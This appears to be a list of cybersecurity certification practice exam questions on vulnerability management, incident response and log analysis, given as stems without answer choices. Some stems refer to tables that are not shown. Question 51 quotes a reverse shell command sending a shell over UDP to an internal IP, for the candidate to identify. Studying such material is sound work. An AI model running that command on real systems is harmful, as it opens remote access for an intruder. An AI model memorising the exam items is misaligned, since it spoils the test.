MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
Question2: Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
Question3: Which of the following tools would work best to prevent the exposure of PII outside of an organization?
Question4: An analyst is reviewing a vulnerability report for a server environment with the following entries:Which of the following systems should be prioritized for patching first?
Question5: Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
Question6: You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers and recommend changes if you find they are not The company's hardening guidelines indicate the following* TLS 1 2 is the only version of TLS running.* Apache 2.4.18 or greater should be used.* Only default ports should be used.INSTRUCTIONSusing the supplied data. record the status of compliance With the company's guidelines for each server.The question contains two parts: make sure you complete Part 1 and Part 2.Make recommendations for Issues based ONLY on the hardening guidelines provided.Part 1:AppServ1:AppServ2:AppServ3:AppServ4:Part 2:
Question7: During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
Question8: Which of the following is the most important factor to ensure accurate incident response reporting?
Question9: A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
Question10: The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program.Which of the following is the best priority based on common attack frameworks?
Question11: A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?
Question12: A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
Question13: The developers recently deployed new code to three web servers. A daffy automated external device scan report shows server vulnerabilities that are failure items according to PCI DSS.If the venerability is not valid, the analyst must take the proper steps to get the scan clean.If the venerability is valid, the analyst must remediate the finding.After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation Result and Remediation Action for each server listed using the drop-down options.INTRUCTIONS:The simulation includes 2 steps.Step1:Review the information provided in the network diagram and then move to the STEP 2 tab.STEP 2: Given the Scenario, determine which remediation action is required to address the vulnerability.
Question14: After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?
Question15: A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
Question16: During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware.Which of the following actions should be performed immediately?
Question17: A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?
Question18: An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
Question19: Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
Question20: You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.There must be one primary server or service per device.Only default port should be usedNon- secure protocols should be disabled.The corporate internet presence should be placed in a protected subnetInstructions :Using the available tools, discover devices on the corporate network and the services running on these devices.You must determineip address of each deviceThe primary server or service each deviceThe protocols that should be disabled based on the hardening guidelines
Question21: Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?
Question22: An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
Question23: Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:Which of the following should the security analyst prioritize for remediation?
Question24: Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
Question25: A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:Which of the following should be completed first to remediate the findings?
Question26: A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
Question27: Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
Question28: A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
Question29: A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?
Question30: There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
Question31: Which of the following best describes the key elements of a successful information security program?
Question32: A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
Question33: An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of- life date. Which of the following best describes a security analyst's concern?
Question34: The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?
Question35: While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code?
Question36: A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?
Question37: A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
Question38: New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
Question39: While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
Question40: A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
Question41: Given the following CVSS string-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:HWhich of the following attributes correctly describes this vulnerability?
Question42: A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
Question43: Which of the following would help to minimize human engagement and aid in process improvement in security operations?
Question44: An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window.However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
Question45: A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
Question46: During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
Question47: A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:Which of the following has most likely occurred?
Question48: Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
Question49: An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
Question50: A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
Question51: A security analyst detects an exploit attempt containing the following command:sh -i >& /dev/udp/10.1.1.1/4821 0>$lWhich of the following is being attempted?
Question52: Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?
Question53: Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
Question54: Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:Which of the following choices should the analyst look at first?
Question55: Which of the following risk management principles is accomplished by purchasing cyber insurance?
Question56: An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
Question57: Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?
Question58: Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?
Question59: A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system?
Question60: Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
Question61: A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8.Which of the following best practices should the company follow with this proxy?
Question62: An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned?
Question63: A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time.Which of the following techniques should be performed to meet the CISO's goals?
Question64: Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
Question65: A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been compromised. Which of the following steps should the administrator take next?
Question66: A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
Question67: A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
Question68: Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
Question69: Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Question70: A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
Question71: An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:Which of the following tuning recommendations should the security analyst share?